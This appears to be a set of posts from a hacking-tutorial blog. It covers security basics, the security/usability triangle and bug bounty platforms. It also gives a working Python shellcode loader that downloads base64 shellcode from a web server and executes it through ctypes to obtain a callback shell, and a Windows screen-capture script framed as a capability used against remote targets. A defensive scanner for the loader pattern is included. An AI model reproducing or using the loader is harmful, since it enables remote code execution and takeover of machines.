The Dark Tech

For Beginners

2. The Security Triangle (Security Model)

December 31, 2021 by BlackHammer

The security, functionality, and usability triangle, also known as the CIA triangle (confidentiality, integrity, and availability), is explained here in brief. These three factors make up what is known as the security triangle. In the domain of cyber security, the security triangle plays a very important role in keeping you from becoming the victim of a cyber attack, so here you will get a full idea of it.

The Security, Functionality, and Usability Triangle

Technology is evolving at an unprecedented rate. As a result, new products that are reaching the market focus more on ease-of-use than on secure computing.

Though technology was originally developed for “honest” research and academic purposes, it has not evolved at the same pace as users’ proficiency.

Moreover, in this evolution, system designers often overlook vulnerabilities in the intended deployment of the system. However, adding more built-in default security mechanisms gives users more competence.


With the increased use of computers for a growing number of routine activities, it is becoming difficult for system administrators and system security professionals to allocate resources exclusively for securing systems.

This includes the time needed to check log files, detect vulnerabilities, and apply security update patches.

As routine activities consume system administrators’ time, leaving less time for vigilant administration, there is little time to deploy measures and secure computing resources on a regular and innovative basis.

This fact has increased the demand for dedicated security professionals to constantly monitor and defend ICT (Information and Communication Technology) resources.

Originally, to “hack” meant to possess extraordinary computer skills to explore hidden features of computer systems. In the context of Information security, hacking is defined as the exploitation of vulnerabilities of computer systems and networks and requires great proficiency.

However, today there are automated tools and code available on the Internet that make it possible for anyone who possesses the will to succeed at hacking. However, merely compromising system security does not denote hacking success.


There are websites that insist on “taking back the Internet” as well as people who believe that they are doing everyone a favor by posting details of their exploits. In reality, doing so serves to lower the skill level required to become a successful attacker.

The ease with which system vulnerabilities can be exploited has increased while the knowledge curve required to perform such exploits has decreased. The concept of the elite “super attacker” is an illusion.

However, the fast-evolving genre of “script kiddies” is largely composed of lesser-skilled individuals with second-hand knowledge of performing exploits. One of the main impediments to the growth of security infrastructure lies in the unwillingness of exploited or compromised victims to report such incidents, for fear of losing the goodwill and faith of their employees, customers, or partners, and/or of losing market share.

The trend of information assets influencing the market has seen more companies thinking twice before reporting incidents to law enforcement officials for fear of “bad press” and negative publicity.

The increasingly networked environment, with companies often using their websites as single points of contact across geographical boundaries, makes it critical for administrators to take countermeasures to prevent exploits that can result in data loss. This is why corporations need to invest in security measures to protect their information assets.

The level of security in any system can be defined by the strength of three components:

  • Functionality: The set of features provided by the system.
  • Usability: The GUI components used to design the system for ease of use.
  • Security: Restrictions imposed on accessing the components of the system.


The relationship between these three components is demonstrated using a triangle, because an increase or decrease in any one component automatically affects the other two. Moving the ball towards any of the three components means decreasing the intensity of the other two.

The diagram in the slide represents the relationship between functionality, usability, and security. For example, as shown in the slide above, if the ball moves towards Security, it means increased security and decreased functionality and usability.

If the ball is in the center of the triangle, then all three components are balanced. If the ball moves towards Usability, it means increased usability and decreased functionality as well as security. For any implementation of security controls, all three components have to be considered carefully and balanced to get acceptable functionality and usability with acceptable security.

That’s it for today; the next topic is in the next blog.

-Ajinkya Kadam


1. Information Security Overview

December 31, 2021 by BlackHammer

In this article, we will tell you what information security is and some basic things about it.

Information security refers to the protection or safeguarding of information, and of the information systems that use, store, and transmit it, against unauthorized access, disclosure, alteration, and destruction.


Information is a critical asset that organizations need to secure. If sensitive information falls into the wrong hands, the respective organization may suffer huge losses in terms of critical information resources. Let us start with an overview of information security.

This section covers various statistics, threat predictions, and essential terminology pertaining to information security, elements of information security, as well as the security, functionality, and usability triangle.

Nowadays information security is both the best and the worst part of an organization; sometimes it is very difficult to protect information from black hat hackers.


It has some essential terminology, which is the following:

  • Hack Value
  • Vulnerability
  • Exploit
  • Payload
  • Zero-day Attack
  • Daisy Chaining
  • Doxing
  • Bot

Some Basic Elements of Information Security

  • Confidentiality
  • Integrity
  • Availability
  • Authenticity
  • Non-Repudiation

NOTE: “If you need brief information about this term you can comment below with your email address we will definitely help you”


“The next article is more interesting so stay tuned with us”

  • Ajinkya Kadam


Top 10 High Paying Bug Bounty Program In 2020

December 8, 2021 by BlackHammer

What Is Bug Bounty Program

A Bug Bounty program is a deal offered by many websites, organizations, and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to security exploits and vulnerabilities. These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse. Bug bounty programs have been implemented by a large number of organizations, including Mozilla, Facebook, Yahoo!, Google, Reddit, Square, Microsoft, and the Internet Bug Bounty.

Bugcrowd

Bugcrowd has a standard sign-up process and doesn’t require any proof of experience to become a researcher. You can choose to make your profile public (so people can see the kudos points you’ve accumulated and general stats about your involvement) or keep it private. Your page shows your rank, how many points you’ve accumulated, how many submissions you’ve made over time, and the accuracy of those submissions. It also displays the average severity of the vulnerabilities you’ve had rewarded, on a scale of low-moderate-high-critical.

Bugcrowd also maintains a system for classifying vulnerabilities, called the Vulnerability Rating Taxonomy, in an effort to further bolster transparency and communication, as well as to contribute valuable and actionable content to the bug bounty community. For researchers specifically, the company contends the VRT help[s] program participants save valuable time and effort in their quest to make bounty targets more secure, helping them identify which types of high-value bugs they have overlooked.

Astute researchers will often specialize their skillset to become proficient at detecting a handful of bugs. As you work through the exercises and think about which strategies you’d like to dedicate time to, resources such as the VRT can help you triangulate that perfect intersection of effort and reward.

Bugcrowd uses metrics about your behavior, pulled from the last 90 days, to determine which researchers to invite to private bounty programs. These private programs are opened to a limited set of researchers, who are given a window of time in which to find vulnerabilities. These private programs are great because they mean fewer researchers combing through a particular site, and therefore more chances for you to discover bugs.

The company also provides a useful service where, every time you log in, Sometimes program guidelines will ask you to create a testing account using this email so the participating company can monitor researchers, but regardless, they’re a great resource. Because it’s a Gmail service, you can also change the address if you need to spin up multiple accounts.

You can find a wide spectrum of businesses on Bugcrowd, covering every size and a variety of revenue models. The targets trend towards web applications, but there is also a smattering of mobile apps and the odd alternative listing.

HackerOne

HackerOne is a similar platform; it has its own point system (reputation) and also calculates a variety of metrics that it uses as the basis for its Leaderboard and for invitations to its own private programs. Like Bugcrowd, it also has a bug bounty policy for itself: if you find a vulnerability in one of its sites or apps, you’re entitled to a reward. Interestingly though, you might still be entitled to a reward even if you don’t discover a bug. From their site:

“HackerOne is interested in your research on our systems, regardless of whether you found a security vulnerability. If you have found yourself looking at a particular feature on one of our assets but didn’t find anything, please submit a report that describes all the different things you tried and failed. We may reward you for substantial research performed on assets under our bug bounty policy.”

This is an unusual policy that still makes sense: providing a detailed list of everything that worked is its own audit of the company’s resources, even if it doesn’t cover any vulnerable areas. HackerOne and Bugcrowd both have a similar breadth of different companies, with different products, business models, and security needs. HackerOne does have a few notable companies that are exclusive to its platform, most notably Twitter, but generally the offerings are very similar.

Vulnerability Lab

Vulnerability lab is a submission-and-disclosure platform that uses a team of in-house experts to vet high-profile vulnerabilities, but also accepts submissions on less critical/lower-profile bugs. One of their site’s features actually involves receiving reports for critical vulnerabilities that a researcher might not want to submit directly and acting as a point of contact and third-party broker for the researcher with the affected company.

Like HackerOne, it publicly discloses bug reports after a window of time has elapsed, and is a useful reference for beginners looking to better understand the form of bug reports, and methods for discovering and reporting common vulnerabilities. Their public index of vulnerabilities is also tagged with the type of system each bug was found on, making it a nice resource when you’re trying to get a sense of application-specific problems.

BountyFactory

BountyFactory, which touts itself as the first European bug bounty platform that relies on European rules and legislation, is run by the larger YesWeH4ck group, an Infosec recruiting company founded in 2013 that’s made up of a bug bounty platform, a job board (YesWeH4ck Jobs), a coordinated vulnerability-disclosure platform (ZeroDisclo), and an aggregation of all public bug bounty programs (FireBounty).

Like Bugcrowd and HackerOne, BountyFactory has a scoring system, leaderboard, and both public and private programs, for which it extends a limited number of invitations. Because of its European orientation, BountyFactory is great for finding companies, such as OVH, Orange, and Qwant, that aren’t on the popular, American-run alternatives. Many of its clients are straight out of the French start-up scene.

Synack

Synack relies on a completely different business model from all the other programs we’ve discussed. As a private program that prides itself on its quality and exclusivity, Synack requires more than just an email to become a researcher. The company asks for personal information, requests a video interview, initiates a background and ID check, and conducts a skills assessment to ensure their researchers are capable and responsible enough to audit programs where they might come into contact with sensitive data (one of Synack’s specialties). Fewer than 10% of applicants to their Red Team are accepted. And unlike the other programs, Synack doesn’t publish a leaderboard or any sort of researcher ranking publicly (though they do keep internal rankings as the basis for rewards and invitations to select campaigns).

Intermediaries such as Synack are great if you’re looking for more of the private-program type of engagements you’re already being invited to on Bugcrowd or HackerOne, where researchers receive exclusive, limited access to the target application. It’s also great if you need a quick payout time, or want access to the professional development materials the company only makes available to member researchers. The fact that Synack keeps its researchers’ identities secret is also a benefit, as, though adhering to the Rules of Engagement (RoE) is always important, it offers the researcher some protection from legal action by companies trying to discourage aggressive auditing, or who interpret their own RoE differently than you do.

In general, Synack is a good option if you’ve already cut your teeth on bug bounty marketplaces where the cost to join isn’t as high, and are looking to make a bigger commitment to security research. If you’re willing and able to get past their screening process, working as part of their red team will secure you less-trafficked targets, exclusive engagements, and quicker payouts.

Company-Sponsored Initiatives

Company-sponsored programs are just what they sound like. It’s not just large mega-corps that have bounty programs; a surprising number of businesses have a process for rewarding security contributions. The size of each company can drastically affect the requirements and conditions for a reward: large companies pay top dollar for vulnerabilities, but the low-hanging fruit of those flaws will already have been picked; start-ups will have less mature applications, but probably a smaller application attack surface, assembled from a newer stack with fewer known vulnerabilities, and might want to pay for contributions in swag. Companies that are mature enough to suffer from technical debt, but also have a budget to pay rewards, are a nice fit. Sometimes, though, you’ll just have to poke around in different areas, taking your chances, to find your next vulnerability. Here are some examples of the programs offered by larger companies.

Google

Google’s program is expansive, with detailed payout structures and specific instructions for classifying different types of bug. Most of the relevant information can be found on the rewards section of their Application Security page, but Google also curates a (small) set of pentesting tutorials, with specific attention paid to finding the types of bugs and submitting the kinds of reports about them that Google wants to receive.

The articles on Bughunter University and other Google resources have different levels of applicability (some of it is just Google’s preferences, requirements, and so on), but even the more idiosyncratic sections contain best practices and wisdom that can be applied to other programs and engagements. Other companies might not agree completely with their common types of non-qualifying report, but there’ll still be substantial overlap, making it a useful guide regardless of the vendor.

In addition to the materials on Bughunter University, Google is responsible for creating and maintaining a lot of great instructional applications. We’ll be using one, Google Gruyere, as part of our chapter on XSS and you can find other great resources from Google in the other tools section at the end of the book.

Facebook

Facebook has a bug bounty program with a minimum payout of $500, but as the very direct language in their responsible disclosure policy attests, they do not tolerate mucking about with production data: if you comply with the policies when reporting a security issue to Facebook, they will not initiate a lawsuit or law enforcement investigation against you in response to your report.

The amount of information available for their program is minimal. You’ll find a side-by-side example of a submission report and an improved version, with some non-qualifying vulnerabilities, but not much in the way of universal lessons or professional tips.

As the legalese signals, Facebook is very sensitive to misuse of its platform, especially given recent increased scrutiny. And because so many exploits will be aimed at affecting users, it’s critical to stop short of writing any code that could subvert an account.

Amazon

Amazon has vulnerability programs for both its e-commerce and cloud services divisions. An important point is that Amazon requires you to register and ask for permission before conducting any sort of pentesting engagement. This is critical, and a key way the company differs from some of its competitors. Instead of an open-ended participation model where, as long as you abide by the rules of engagement, you can expect immunity, Amazon enforces a permissions-first model to better contain pentesting activity and differentiate White- and Black-Hat activity.

Amazon has a multitude of white papers, blog posts, and documentation on how security works within Amazon, but less material than Facebook or Google to help with penetration testing or bug bounty participation generally.

GitHub

GitHub offers a bounty program that covers a wide array of its properties, including the API, enterprise app, and main rails site, with payouts ranging from $555 to $20,000 for most of those targets.

One neat feature of the GitHub program is that each participant who successfully submits a bounty receives a profile page that, in addition to showing the points they’ve accumulated, rank, and earned badges, lists their reported vulnerabilities with a short technical blurb about each one. Like the published submission reports on other platforms, any technical detail about a successfully discovered vulnerability is an invaluable insight into winning strategies, both in general and for the site in question. And if you’re looking to parlay finding bugs into a larger career in security, profile pages such as the ones offered by GitHub, Bugcrowd, and HackerOne can be great bullet points on your resume.

Microsoft

Microsoft has a rewards program covering both its consumer-software-stable and web-app products, such as their cloud offering, Azure. The Microsoft Bounty Program site goes into detail about submission-report formatting, showing examples of both good and bad specimens, and has detailed, specific testing guidelines for every Microsoft property included. But there isn’t a deep reserve of learning material from a general pentesting perspective, and less in the way of community. Microsoft, like many other companies, has its own public leaderboard and ranking system.

Their blog is a good source for more general Infosec analysis. In one series, they provide an in-depth analysis, including source code examples, of Windows exploits used by the Shadow Brokers, the infamous hacking syndicate known to have leaked NSA hacking tools in the summer of 2016.


How To Make Base64 Encrypted Shellcode Using Python | ctypes

December 7, 2021 by BlackHammer

What Is Shellcode

In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code.

Pythonic Shellcode Execution

There might come a time when you want to be able to interact with one of your target machines, or use a juicy new exploit module from your favorite penetration testing or exploit framework. This typically, though not always, requires some form of shellcode execution. In order to execute raw shellcode, we simply need to create a buffer in memory and, using the ctypes module, create a function pointer to that memory and call the function. In our case, we’re going to use urllib2 to grab the shellcode from a web server in base64 format and then execute it.

Let’s get started! Open up shell_exec.py and enter the following code:

# Python 2 script (urllib2); the server side below uses SimpleHTTPServer, also Python 2
import urllib2
import ctypes
import base64

# retrieve the shellcode from our web server
url = "http://localhost:8000/shellcode.bin"
response = urllib2.urlopen(url)

# decode the shellcode from base64
shellcode = base64.b64decode(response.read())

How awesome is that? We kick it off by retrieving our base64-encoded shellcode from our web server.

# create a buffer in memory
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))

We then allocate a buffer to hold the shellcode after we’ve decoded it.

# create a function pointer to our shellcode
shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))

The ctypes cast function allows us to cast the buffer to act like a function pointer so that we can call our shellcode like we would call any normal Python function.

# call our shellcode
shellcode_func()

We finish it up by calling our function pointer, which then causes the shellcode to execute.

Let’s Take It For A Spin

You can handcode some shellcode or use your favorite pentesting framework like CANVAS or Metasploit to generate it for you. I picked some Windows x86 callback shellcode for CANVAS in my case. Store the raw shellcode (not the string buffer!) in /tmp/shellcode.raw on your Linux machine and run the following:

thedarktech$ base64 -i shellcode.raw > shellcode.bin
thedarktech$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

We simply base64-encoded the shellcode using the standard Linux command line. The next little trick uses the SimpleHTTPServer module to treat your current working directory (in our case, /tmp/) as its web root. Any requests for files will be served automatically for you. Now drop your shell_exec.py script in your Windows VM and execute it. You should see the following in your Linux terminal:

192.168.112.130 - - [12/Jan/2014 21:36:30] "GET /shellcode.bin HTTP/1.1" 200

This indicates that your script has retrieved the shellcode from the simple web server that you set up using the SimpleHTTPServer module. If all goes well, you’ll receive a shell back to your framework, and have popped calc.exe, or displayed a message box or whatever your shellcode was compiled for.
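The loader above has a recognisable shape, which is what a defender can key on. As an added example that is not part of the original post, here is a small static triage scanner that scores Python source for that shape (HTTP fetch, base64 decode, ctypes string buffer, cast to a CFUNCTYPE pointer); the indicator weights and both sample sources are assumptions constructed for this demonstration.

```python
import re

# Indicators drawn from the loader pattern in the post: fetch over HTTP, base64-decode,
# copy into a ctypes string buffer, cast the buffer to a CFUNCTYPE pointer and call it.
# The weights are an assumed triage heuristic, not a calibrated score.
INDICATORS = [
    ("remote_fetch", re.compile(r"\burllib2?\.urlopen\(|\burllib\.request\.urlopen\("), 1),
    ("base64_decode", re.compile(r"\bbase64\.b64decode\("), 1),
    ("raw_buffer", re.compile(r"\bctypes\.create_string_buffer\("), 2),
    ("func_pointer_cast", re.compile(r"\bctypes\.cast\([^)]*\bctypes\.CFUNCTYPE\("), 3),
]


def scan_source(filename, source):
    """Scan one Python source text; return which indicators hit (with line numbers) and a score."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern, _weight in INDICATORS:
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    score = sum(weight for name, _pattern, weight in INDICATORS if name in hits)
    return {
        "file": filename,
        "hits": hits,
        "score": score,
        # A raw buffer cast straight to a function pointer is the core of the technique.
        "suspicious": "raw_buffer" in hits and "func_pointer_cast" in hits,
    }


def triage(sources, threshold=5):
    """Scan a {filename: source} mapping; return findings at or above threshold, highest score first."""
    findings = (scan_source(name, text) for name, text in sources.items())
    return sorted((f for f in findings if f["score"] >= threshold), key=lambda f: -f["score"])


# Constructed samples: LOADER mirrors the post's shell_exec.py; BENIGN uses ctypes and
# urllib2 legitimately (a fixed-size buffer and a version check) and must not be flagged.
LOADER = """\
import urllib2
import ctypes
import base64
url = "http://localhost:8000/shellcode.bin"
response = urllib2.urlopen(url)
shellcode = base64.b64decode(response.read())
shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))
"""

BENIGN = """\
import urllib2
import ctypes
buf = ctypes.create_string_buffer(64)
ptr = ctypes.cast(buf, ctypes.POINTER(ctypes.c_char))
latest = urllib2.urlopen("http://localhost:8000/version.txt").read()
"""

if __name__ == "__main__":
    for finding in triage({"loader.py": LOADER, "benign.py": BENIGN}):
        print(finding["file"], finding["score"], sorted(finding["hits"]))
```

Only loader.py reaches the threshold; the benign file scores on the fetch and the buffer alone, which is why the cast to a function pointer carries the most weight.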


How To Take Screenshot In Windows Computer Using Python

December 6, 2021 by BlackHammer

Most pieces of malware and penetration testing frameworks include the capability to take screenshots against the remote target. This can help capture images, video frames, or other sensitive data that you might not see with a packet capture or keylogger. Thankfully, we can use the PyWin32 package to make native calls to the Windows API to grab them.

A screenshot grabber will use the Windows Graphics Device Interface (GDI) to determine necessary properties such as the total screen size, and to grab the image. Some screenshot software will only grab a picture of the currently active window or application, but in our case we want the entire screen.

Let’s get started. Crack open screenshotter.py and drop in the following code:

import win32gui
import win32ui
import win32con
import win32api
# grab a handle to the main desktop window
hdesktop = win32gui.GetDesktopWindow()

Let’s review what this little script does. First we acquire a handle to the entire desktop, which includes the entire viewable area across multiple monitors.

# determine the size of all monitors in pixels
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

We then determine the size of the screen(s) so that we know the dimensions required for the screenshot.

# create a device context
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)

We create a device context using the GetWindowDC function call and pass in a handle to our desktop.

# create a memory based device context
mem_dc = img_dc.CreateCompatibleDC()

Next we need to create a memory-based device context where we will store our image capture until we store the bitmap bytes to a file.

# create a bitmap object
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)

We then create a bitmap object that is set to the device context of our desktop. The SelectObject call then sets the memory-based device context to point at the bitmap object that we’re capturing.

# copy the screen into our memory device context
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)

We use the BitBlt function to take a bit-for-bit copy of the desktop image and store it in the memory- based context. Think of this as a memcpy call for GDI objects.

# save the bitmap to a file
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')

# free our objects: the memory DC and bitmap we created, then give the
# window DC obtained from GetWindowDC back to the system (it is released, not deleted)
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
win32gui.ReleaseDC(hdesktop, desktop_dc)

The final step is to dump this image to disk.

This script is easy to test: Just run it from the command line and check the C:\WINDOWS\Temp directory for your screenshot.bmp file.
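The script writes screenshot.bmp with no check that the capture succeeded. As an added example, not from the original post, the following parses the BITMAPFILEHEADER and BITMAPINFOHEADER of such a file and confirms its dimensions match the virtual-screen size obtained from GetSystemMetrics; it runs without Windows because the 2x2 bitmap it checks is constructed inline, and the helper make_bmp exists only to build that sample.

```python
import struct

FILE_HEADER = struct.Struct("<2sIHHI")       # BITMAPFILEHEADER: signature, file size, 2 reserved, pixel offset
INFO_HEADER = struct.Struct("<IiiHHIIiiII")  # BITMAPINFOHEADER: the 40-byte DIB header
BI_RLE8, BI_RLE4 = 1, 2                      # run-length compression values a GDI screenshot never uses


def parse_bmp_header(data):
    """Return (width, height, bits_per_pixel) of a BMP file, or raise ValueError if malformed."""
    if len(data) < FILE_HEADER.size + INFO_HEADER.size:
        raise ValueError("too short for BITMAPFILEHEADER + BITMAPINFOHEADER")
    magic, _file_size, _res1, _res2, off_bits = FILE_HEADER.unpack_from(data, 0)
    if magic != b"BM":
        raise ValueError("missing 'BM' signature")
    (hdr_size, width, height, planes, bpp, compression,
     _img_size, _xppm, _yppm, _clr_used, _clr_imp) = INFO_HEADER.unpack_from(data, FILE_HEADER.size)
    if hdr_size < INFO_HEADER.size or planes != 1 or width <= 0 or height == 0:
        raise ValueError("unsupported or corrupt DIB header")
    if compression in (BI_RLE8, BI_RLE4):
        raise ValueError("run-length compressed bitmap")
    # Rows are padded to 4-byte boundaries; a negative height means top-down storage.
    stride = ((width * bpp + 31) // 32) * 4
    if off_bits + stride * abs(height) > len(data):
        raise ValueError("pixel data truncated")
    return width, abs(height), bpp


def check_screenshot(data, expected_width, expected_height):
    """True when data is a well-formed BMP whose dimensions match the captured virtual screen."""
    try:
        width, height, _bpp = parse_bmp_header(data)
    except ValueError:
        return False
    return (width, height) == (expected_width, expected_height)


def make_bmp(width, height, pixels_bgr):
    """Build a minimal bottom-up 24bpp BMP from a row-major list of (b, g, r) tuples (test data only)."""
    stride = ((width * 24 + 31) // 32) * 4
    rows = []
    for y in range(height):
        row = b"".join(bytes(px) for px in pixels_bgr[y * width:(y + 1) * width])
        rows.append(row.ljust(stride, b"\0"))
    pixel_data = b"".join(reversed(rows))  # BMP stores the bottom row first
    offset = FILE_HEADER.size + INFO_HEADER.size
    info = INFO_HEADER.pack(INFO_HEADER.size, width, height, 1, 24, 0, len(pixel_data), 2835, 2835, 0, 0)
    head = FILE_HEADER.pack(b"BM", offset + len(pixel_data), 0, 0, offset)
    return head + info + pixel_data


# Constructed 2x2 sample standing in for c:\WINDOWS\Temp\screenshot.bmp.
SAMPLE_BMP = make_bmp(2, 2, [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 255)])

if __name__ == "__main__":
    print(parse_bmp_header(SAMPLE_BMP))            # (2, 2, 24)
    print(check_screenshot(SAMPLE_BMP, 2, 2))       # True
    print(check_screenshot(SAMPLE_BMP[:-1], 2, 2))  # False: pixel data truncated
```

Against the real file, pass open(path, 'rb').read() together with the width and height values computed earlier in the script.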

Let’s move on to executing shellcode in the next article.
